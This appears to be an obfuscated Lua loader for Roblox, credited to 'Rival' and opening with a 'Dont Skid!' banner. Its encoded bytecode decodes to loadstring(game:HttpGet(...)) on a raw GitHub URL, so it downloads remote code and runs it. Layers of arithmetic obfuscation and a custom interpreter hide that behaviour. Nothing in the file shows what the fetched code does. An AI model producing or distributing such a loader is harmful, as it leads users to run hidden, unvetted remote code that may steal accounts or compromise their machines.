--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_

                                Dont Skid! | By Rival

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;while true do if (v0==5) then function v15(v16,v17)local v18=1;local v19;v16=v5(v4(v16,5),"..",function(v30)if (v2(v30,2)==79) then v19=v1(v4(v30,1,1));return "";else local v66=v3(v1(v30,16));if v19 then local v71=0;local v72;while true do if (0==v71) then v72=v6(v66,v19);v19=nil;v71=1;end if (v71==1) then return v72;end end else return v66;end end end);local function v20(v31,v32,v33)if v33 then local v67=0;local v68;while true do if (v67==(0 -0)) then v68=(v31/((2 -0)^(v32-((1273 -(432 + 840)) + 0))))%((1628 -(437 + 1189))^(((v33-(4 -3)) -(v32-(1 -0))) + (555 -(523 + 31))));return v68-(v68%(1064 -(496 + 509 + 58)));end end else local v69=(1597 -(1306 + 119 + 170))^(v32-(1 + 0));return (((v31%(v69 + v69))>=v69) and (3 -2)) or (297 -(246 + 51));end end local function v21()local v38=1112 -(148 + 964);local v39;while true do if (0==v38) then v39=v2(v16,v18,v18);v18=v18 + 1;v38=2 -1;end if (v38==(1 -(0 + 0))) then return v39;end end end local function v22()local v40=(6636 -4705) -(981 + 950);local v41;local v42;while true do if (v40==(0 + 0)) then v41,v42=v2(v16,v18,v18 + (1000 -(802 + 196)));v18=v18 + 2;v40=1892 -(910 + 367 + 614);end if ((2 -1)==v40) then return (v42 * (516 -260)) + v41;end end end local function v23()local v43=(1456 -(666 + 790)) -0;local v44;local v45;local v46;local v47;while true do if (v43==(1038 -((1424 -(1135 + 87)) + 835))) then return (v47 * (16779181 -(176 + 1789))) + (v46 * (15223 + 50313)) + (v45 * (670 -414)) + v44;end if (v43==(0 -0)) then v44,v45,v46,v47=v2(v16,v18,v18 + (992 -(35 + (1063 -(45 + 64)))));v18=v18 + ((64 -49) -(6 + 5));v43=1;end end end local function v24()local v48=v23();local v49=v23();return (( -(2 + (0 -0)) * v20(v49,8 + 24)) + (417 -(190 + 226))) * ((2 -0)^(v20(v49,21,(17 -5) + 19) -1023)) * ((((v20(v49,1 + 0,2 + 18) * (2^32)) + v48)/((2 + 0)^(22 + 30))) + (98 -(34 + 63)));end local function v25(v34)local v50;if  not v34 then local v70=0 + 0;while true do if (v70==(167 -((204 -155) + 118))) then v34=v23();if (v34==0) then return "";end break;end end end v50=v4(v16,v18,(v18 + v34) -(1 -0));v18=v18 + v34;local v51={};for v64=(2340 -(500 + 1418)) -(376 + 45), #v50 do v51[v64]=v3(v2(v4(v50,v64,v64)));end return v7(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==1) then v55=nil;v56=nil;v52=2 + 0;end if (v52~=(4 -2)) then else v57=nil;v58=nil;v52=11 -8;end if (v52==0) then v53=0;v54=nil;v52=1;end if (v52==3) then v59=nil;while true do local v73=0 + 0;while true do if (v73~=0) then else if (v53==1) then local v80=0;local v81;while true do if (v80~=(0 -0)) then else v81=317 -(51 + 266);while true do if (v81==0) then v57={v54,v55,nil,v56};v58=v23();v81=1;end if (v81==(1290 -(264 + 1025))) then v59={};v53=2;break;end end break;end end end if (v53==3) then for v83=1,v23() do v55[v83-(1635 -(493 + 1141))]=v28();end for v85=1,v23() do v56[v85]=v23();end return v57;end v73=27 -(7 + 19);end if (v73==(1023 -(533 + 489))) then if (v53==2) then local v82=0 + 0;while true do if (v82~=(542 -(330 + 212))) then else local v103=0;while true do if (0==v103) then for v112=2 -1,v58 do local v113=0;local v114;local v115;local v116;local v117;local v118;while true do if ((0 -0)==v113) then v114=0;v115=nil;v113=1;end if (v113==(8 -6)) then v118=nil;while true do if ((4 -2)~=v114) then else while true do if ((1 + 0)~=v115) then else v118=nil;while true do if (v116==0) then local v151=1634 -(503 + 1131);local v152;local v153;while true do if (v151~=1) then else while true do if (v152~=0) then else v153=0;while true do if (v153~=(1 + 0)) then else v116=1;break;end if (v153~=0) then else local v172=0 + 0;local v173;while true do if (v172==(0 -0)) then v173=0;while true do if ((110 -(102 + 7))==v173) then v153=1;break;end if (v173==(0 -0)) then local v181=0;while true do if (v181~=1) then else v173=851 -(809 + 41);break;end if (v181==0) then v117=v21();v118=nil;v181=682 -(662 + 19);end end end end break;end end end end break;end end break;end if (v151~=0) then else v152=0;v153=nil;v151=1;end end end if (v116==(2 -1)) then if (v117==(376 -(109 + 266))) then v118=v21()~=0;elseif (v117==(5 -3)) then v118=v24();elseif (v117==3) then v118=v25();end v59[v112]=v118;break;end end break;end if (v115~=0) then else local v127=0;while true do if (v127==(1 + 0)) then v115=1;break;end if (v127==(0 -0)) then v116=0 -0;v117=nil;v127=1;end end end end break;end if (v114~=(0 + 0)) then else local v121=0;while true do if (1~=v121) then else v114=1;break;end if (v121==0) then v115=0 + 0;v116=nil;v121=2 -1;end end end if (v114~=1) then else local v122=0;while true do if (v122==0) then v117=nil;v118=nil;v122=1;end if (v122~=1) then else v114=226 -(102 + 122);break;end end end end break;end if (v113~=1) then else v116=nil;v117=nil;v113=2;end end end v57[3]=v21();v103=1 + 0;end if (v103==1) then v82=1;break;end end end if (v82~=(1 + 0)) then else for v104=1725 -(148 + 1576),v23() do local v105=0;local v106;local v107;local v108;while true do if (v105==0) then v106=0 -0;v107=nil;v105=1 + 0;end if (1==v105) then v108=nil;while true do if ((0 + 0)==v106) then v107=0;v108=nil;v106=1;end if (v106==1) then while true do if (v107==0) then v108=v21();if (v20(v108,1 + 0,1 + 0)==0) then local v123=0 + 0;local v124;local v125;local v126;while true do if (v123==(279 -(175 + 102))) then local v145=0;local v146;while true do if (v145==0) then v146=0;while true do if (v146==(1 -0)) then v123=1176 -(73 + 1100);break;end if (v146~=(0 -0)) then else if (v20(v125,1,3 -2)~=1) then else v126[123 -(67 + 54)]=v59[v126[2]];end if (v20(v125,1 + 1,2)~=1) then else v126[5 -2]=v59[v126[1055 -(270 + 782)]];end v146=343 -(208 + 134);end end break;end end end if (v123==0) then local v147=1917 -(576 + 1341);while true do if (v147==(1364 -(18 + 1345))) then v123=1 -0;break;end if (v147==0) then v124=v20(v108,1 + 1,3);v125=v20(v108,4,3 + 3);v147=1;end end end if (v123==3) then if (v20(v125,3 + 0,749 -(251 + 495))==(1 + 0)) then v126[4]=v59[v126[4]];end v54[v104]=v126;break;end if (v123~=(1 + 0)) then else local v149=0 -0;local v150;while true do if (v149==(0 -0)) then v150=0;while true do if (v150==(1764 -(1736 + 28))) then local v163=0;while true do if (1==v163) then v150=2 -1;break;end if (0~=v163) then else v126={v22(),v22(),nil,nil};if (v124==(0 -0)) then local v174=0;while true do if (v174==0) then v126[3 + 0]=v22();v126[937 -(674 + 259)]=v22();break;end end elseif (v124==(541 -(37 + 503))) then v126[6 -3]=v23();elseif (v124==(35 -(24 + 9))) then v126[10 -7]=v23() -((1 + 1)^(73 -57));elseif (v124~=(312 -(10 + 299))) then else local v182=0;local v183;local v184;while true do if ((1562 -(460 + 1101))==v182) then while true do if (v183==0) then v184=0;while true do if (v184==(1254 -(1168 + 86))) then v126[2 + 1]=v23() -((4 -2)^16);v126[7 -3]=v22();break;end end break;end end break;end if ((474 -(371 + 103))~=v182) then else v183=0 -0;v184=nil;v182=1;end end end v163=1;end end end if (v150~=1) then else v123=109 -(29 + 78);break;end end break;end end end end end break;end end break;end end break;end end end v53=3;break;end end end if (v53==0) then v54={};v55={};v56={};v53=2 -1;end break;end end end break;end end end local function v29(v35,v36,v37)local v60=0;local v61;local v62;local v63;while true do if (v60==0) then v61=v35[1];v62=v35[2];v60=1;end if (v60==1) then v63=v35[3];return function(...)local v74=0;local v75;local v76;local v77;local v78;local v79;while true do if (v74==0) then v75=1;v76= -1;v74=1;end if (v74==1) then v77={...};v78=v12("#",...) -1;v74=2;end if (v74==2) then v79=nil;function v79()local v87=v61;local v88=Const;local v89=v62;local v90=v63;local v91=v27;local v92={};local v93={};local v94={};for v99=446 -(160 + 286),v78 do if (((651 + 724)<=(9953 -7403)) and (v99>=v90)) then v92[v99-v90]=v77[v99 + (916 -(198 + 717))];else v94[v99]=v77[v99 + 1 + 0];end end local v95=(v78-v90) + 1;local v96;local v97;while true do local v100=0;local v101;local v102;while true do if (((31 + 1218 + 162)<=1615) and ((0 + (0 -0))==v100)) then v101=0 -0;v102=nil;v100=1;end if ((462<(2465 + 522)) and (v100==(1 -0))) then while true do if ((v101==((0 -0) + 0 + 0)) or ((12898 -9630)>=(12326 -8377))) then v102=(0 -0) -0;while true do if ((v102==0) or ((456 + 1333)>(6619 -1733))) then local v119=146 -(124 + (143 -(42 + 79)));local v120;while true do if (((1927 + 1752)>=(5423 -3126)) and ((756 -(516 + 240))==v119)) then v120=(16 + 2) -(16 + 2);while true do if ((v120==0) or (3821==(1747 -(654 + 130)))) then local v128=1332 -(203 + 1129);while true do if ((v128==(0 + 0)) or (((3468 + 385) -(19 + (373 -217)))<((3207 -(26 + 1279)) + 120))) then v96=v87[v75];v97=v96[1 + 0];v128=2 -1;end if (((5284 -(15 + 1496))==(5136 -(1058 + 305))) and (v128==(1 + 0))) then v120=(2 -1) + 0;break;end end end if ((v120==(1688 -(1009 + 678))) or (2286<=(338 -147))) then v102=(634 -(505 + 126)) -2;break;end end break;end end end if ((v102==((2 -1) + 0 + 0)) or (((3981 -2953) + (1426 -(453 + 547)))>4248)) then if ((v97<=(2 + 0 + 0)) or ((7762 -4274)<=(4240 -3094))) then if ((v97<=(0 -0)) or ((3545 -1470)>(3559 -1472))) then do return;end elseif (((4137 -(207 + 974))==(4475 -(1456 + 63))) and (v97>(340 -(144 + 195)))) then v94[v96[475 -(311 + 162)]]=v96[2 + 1];else local v130=0 + 0;local v131;local v132;local v133;local v134;local v135;local v136;while true do if (((7749 -4545)>(356 + 74)) and (v130==(1 -0))) then v133=nil;v134=nil;v130=1932 -(70 + 1860);end if (((4833 -(364 + 179))==(5657 -(1219 + 148))) and (v130==(1874 -(877 + 994)))) then while true do if (((5031 -(164 + 339))>(101 + 1395)) and (v131==(345 -(54 + 290)))) then local v157=0;while true do if ((4722>=(1066 + 1492)) and (v157==(1297 -(1292 + 4)))) then v131=1766 -(338 + 1426);break;end if ((v157==(0 -0)) or ((1455 -(1210 + 20 + 212))>559)) then v134=nil;v135=nil;v157=2 -1;end end end if (((0 -0)==v131) or ((2014 -(1390 + 174))>=(3633 -(581 + 727)))) then v132=0;v133=nil;v131=1;end if ((v131==((60 + 1694) -((2369 -1314) + 697))) or ((72 + 80)>(3170 -(684 + 519)))) then v136=nil;while true do if ((v132==(92 -(62 + 30))) or (1139==(166 + (1299 -840)))) then local v166=1291 -(11 + 1280);local v167;while true do if ((v166==(1292 -(355 + (2647 -(584 + 1126))))) or (3140<=(2559 -(971 + (998 -559))))) then v167=0;while true do if ((v167==(642 -((1129 -856) + 368))) or ((1558 -(10 + 14))<=(685 -((585 -(509 + 19)) + 171)))) then v132=1 + 0 + 0;break;end if (((1337 + 83)>(1258 -(661 + 459))) and (v167==(358 -(113 + 245)))) then v133=v96[2];v134,v135=v91(v94[v133](v13(v94,v133 + (2 -1),v96[6 -3])));v167=2 -1;end end break;end end end if (((7311 -(18906 -13887))>(2598 -(545 + 115 + 1023))) and (v132==(1838 -(1705 + 131)))) then for v170=v133,v76 do local v171=0 + (1778 -(44 + 1734));while true do if ((((6213 -(1684 + 62)) -1583)>((3052 -1650) -(373 + 1021))) and (v171==(216 -(21 + 195)))) then v136=v136 + 1;v94[v170]=v134[v136];break;end end end break;end if ((v132==1) or (3990<(1075 -(523 + 254)))) then local v168=0 + 0;local v169;while true do if ((((873 -(223 + 650)) -0)==v168) or ((1792 + 119)>(5475 -3504))) then v169=0 + 0;while true do if ((189<(17204 -12993)) and (v169==(2 -1))) then v132=2 + 0;break;end if ((v169==0) or (1521==1482)) then v76=(v135 + v133) -((1 + 2) -2);v136=0 + 0;v169=1 + 0;end end break;end end end end break;end end break;end if ((v130==(220 -(190 + 30))) or ((1886 -1078)>(1544 -(342 + 217)))) then v131=0 -(691 -(108 + 583));v132=nil;v130=1 -0;end if ((v130==(1967 -(1185 + 780))) or ((3066 -1622)==(5023 -3307))) then v135=nil;v136=nil;v130=1292 -(490 + 799);end end end elseif (((2746 -(1509 + 384))<1201) and (v97<=(11 -7))) then if ((((2852 -(412 + 1083)) -(146 + 58))<=(5603 -((2755 -2091) + 392))) and (v97>(11 -8))) then local v137=0 + 0;local v138;local v139;local v140;while true do if ((v137==(1 -0)) or (((2900 -1565) + 544)<=((278 -164) + 372))) then v140=nil;while true do if (((10247 -6539)==(609 + (6150 -3051))) and (v138==(1863 -(1595 + 268)))) then local v158=154 -((2008 -(1707 + 212)) + 65);local v159;while true do if (((555 -349)==(86 + 120)) and (v158==0)) then v159=0 -0;while true do if (((1 + 0)==v159) or (((4314 -(393 + 539)) -((629 -349) + 7))<=(278 + 43))) then v138=1 + 0;break;end if ((v159==(0 + 0)) or ((8282 -6110)>=(6040 -(226 + 968)))) then local v175=0 + 0;while true do if (((2 -1)==v175) or ((3806 -(473 + 112))<=(2084 -(2377 -985)))) then v159=1 + 0;break;end if (((3166 -(559 + 1161))==(1330 + 116)) and (v175==(0 + 0))) then v139=v96[782 -(493 + 255 + 32)];v140=v94[v96[273 -(185 + 85)]];v175=2 -1;end end end end break;end end end if ((v138==(2 -1)) or ((3167 + 824)<=(2549 + 684))) then v94[v139 + 1 + 0 + 0]=v140;v94[v139]=v140[v96[(783 -(247 + 535)) + 3]];break;end end break;end if ((2356<=(2233 + 416)) and (v137==0)) then local v156=0 -0;while true do if ((v156==1) or (2614<1783)) then v137=2 -1;break;end if (((2852 + 49)>((64 + 3876) -(1003 + 356))) and (v156==(61 -(28 + 33)))) then v138=261 -(192 + 69);v139=nil;v156=1 + (274 -(8 + 266));end end end end else local v141=0;local v142;local v143;while true do if (((1936 -(144 + 714))<(737 + 1927)) and (v141==(0 + (502 -(361 + 141))))) then v142=(1976 -(455 + 1521)) -0;v143=nil;v141=(1779 -(810 + 585)) -(113 + 19 + 251);end if (((6678 -5103)<=3888) and (1==v141)) then while true do if ((((3292 -872) -(312 + 1402))==(833 -(46 + 81))) and (v142==(0 -(0 -0)))) then v143=v96[2 + 0];v94[v143]=v94[v143](v13(v94,v143 + (596 -((718 -(405 + 33)) + 315)),v76));break;end end break;end end end elseif ((v97==(5 + 0)) or ((7508 -4666)>=(5563 -(1534 + 55)))) then v94[v96[1341 -(651 + (1500 -812))]]=v37[v96[3 + 0]];else v94[v96[1181 -(774 + 405)]]();end v75=v75 + 1 + 0;break;end end break;end end break;end end end end v74=3;end if (v74==3) then A,B=v27(v11(v79));if  not A[1] then local v98=v35[4][v75] or "?";error("Script error at ["   .. v98   .. "]:"   .. A[2]);else return v13(A,2,B);end break;end end end;end end end return v29(v28(),{},v17)();end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F536C2O72732F50726F6A65637479756E2F6D61696E2F6279726976616C736C6F6C00083O0012053O00013O001205000100023O002004000100010003001202000300044O0001000100034O00035O00022O00063O000100016O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9());break;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==4) then v13=unpack or table.unpack;v14=tonumber;v15=nil;v0=5;end if (v0==2) then v7=table.concat;v8=table.insert;v9=getfenv or function()return _ENV;end;v0=3;end if (v0==3) then v10=setmetatable;v11=pcall;v12=select;v0=4;end end end
